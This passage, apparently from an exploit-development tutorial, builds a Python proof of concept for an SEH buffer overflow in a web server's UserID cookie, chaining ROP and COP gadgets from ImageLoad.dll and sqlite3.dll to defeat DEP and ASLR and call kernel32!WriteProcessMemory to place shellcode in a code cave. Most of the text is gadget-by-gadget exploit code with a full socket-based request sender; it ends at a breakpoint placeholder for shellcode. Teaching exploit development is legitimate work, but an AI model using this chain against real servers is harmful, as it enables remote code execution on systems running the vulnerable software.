crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

It should also be noted, that after each of these ROP gadgets are executed - the AL register will be increased by 0x39 bytes. We will compensate for this in the future. Since AL only makes up the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we are trying to accomplish.

The state of the registers before execution can be seen below.

ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter placeholder.

A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with the legitimate parameter.

crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

The state of the parameters before the overwrite occurs can be seen below.

As we can see, the junk 0x22222222 parameter will be the target for the overwrite.

Stepping through the instruction, we have dynamically changed the parameter placeholder for nSize to the legitimate parameter!


Perfect! All that is left now is to is extract our current pointer to kernel32.dll and calculate the offset between kernel32WriteFileImplementation and kernel32!WriteProcessMemory. After this, we will use the same primitive of dynamically manipulating the kernel32WriteProcessMemory parameter placeholder to point to the actual API.

Currently. ECX (the register we have been leveraging for each of the arbitrary writes to overwrite function parameter placeholders), is 0x14 (20 decimal) bytes away from the kernel32!WriteProcessMemory parameter placeholder.

Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

Once the ROP gadgets have executed, ECX now contains the same address as the parameter placeholder for kernel32!WriteProcessMemory.

The goal now is to dereference the kernel32!WriteProcessMemory parameter placeholder and place it in a CPU register we have control over.

Since ECX is reserved for the arbitrary write, we will use EAX to also store the kernel32!WriteProcessMemory parameter placeholder.

Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not manipulated EDX since. Conveniently, the current distance between the address within EAX and the kernel32!WriteProcessMemory parameter placeholder is 0x260.

Since we already have a routine of ROP and COP gadgets that increases EDX 0x180 bytes, we can utilize the EXACT same routine to increase it another 0x180 bytes - which will give us a value of 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place the difference in EAX. This will allow us to store the kernel32!WriteProcessMemory parameter placholder in EAX. This time, however, since EDI already contains the old β€œreturn to the stack” routine - we can just directly add to EDX.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

After the add edx COP gadgets execute, EDX contains the distance between the kernel32!WriteProcessMemory and EAX (which is 0x260).

After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution - resulting in EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.

So currently, as it stands, the stack address of 0x2636920, which changes when the process restarts, points to 0x61c832e4 - which then points to the kernel32.dll address. This means we have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the exact same routine, we will dereference 0x61c832e4 (which is a pointer to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with two ROP gadgets.

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX (0x61c832e4).

Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX - dynamically!

This is great news. We have defeated ASLR on the system itself. What needs to happen now is that we need to find the offset between kernel32!WriteProcessMemory and kernel32WriteFileImplementation. To do this, we can use WinDbg.

Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes - we use the negative distance).

However, if we subtract these two values - it seems as though there is an issue and kernel32!WriteProcessMemory is not extracted properly.

Instead of fighting with two’s complement math - let’s just use a different function from the IAT. Preferably, let’s find a function that is less than in value, in terms of the virtual address, than kernel32!WriteProcessMemory.

Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points to kernel32!GetStartupInfoA.

Subtracting the two functions results in a value of 0xfffffd2d - and also yields our desired output!

Now that we have solved this issue, let’s show the full PoC up until this point.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host:\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer:\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))

Now that we have an updated POC, let’s use a ROP routine to subtract this value from EAX.

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

The above routine will do the following:

  1. Zero out EDX
  2. Place the offset into EBX
  3. Move the offset to EDX
  4. Subtract the offset from EDX and EAX - placing the result in EAX

The negative distance between the two kernel32.dll pointers is loaded into EBX.

The distance is then loaded into EDX.

Program execution then reaches the sub eax, edx instruction.

This allows us to successfully extract kernel32!WriteProcessMemory!

Perfect! All there is left to do now is use our arbitrary write primitive to overwrite the kernel32WriteProcessMemory parameter placeholder on the stack with the actual address of kernel32!WriteProcessMemory.

If you can recall, we already decremented ECX to make it contain the address of the parameter placeholder. However, the ROP gadget we will use for our arbitrary write, does so with ECX at an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

After we decrement ECX, we will use the arbitrary write gadget.

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the arbitrary write - and we can see we will be overwriting our parameter placeholder - as intended.

The arbitrary write occurs, and we have successfully dynamically placed our parameters on the stack!

Now that everything has been configured properly, the final goal is to kick off this function call. To do so, we will need to load the stack address which points to kernel32!WriteProcessMemory into ESP - and return into it.

Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes above the stack address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary write ROP gadget). This means we want to increase ECX to contain the address on the stack in question.

The goal now will be to:

  1. Set ECX equal to the stack address pointing to kernel32!WriteProcessMemory
  2. Load ECX into EAX
  3. Exchange EAX and ESP, then return into ESP

Our last ROP routine can solve this issue!

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

Let’s also add some breakpoints to β€œmimic” shellcode - directly after the xchg eax, esp ROP gadget.

# NOPs before shellcode
crash += "\x90" * 230

# Breakpoints
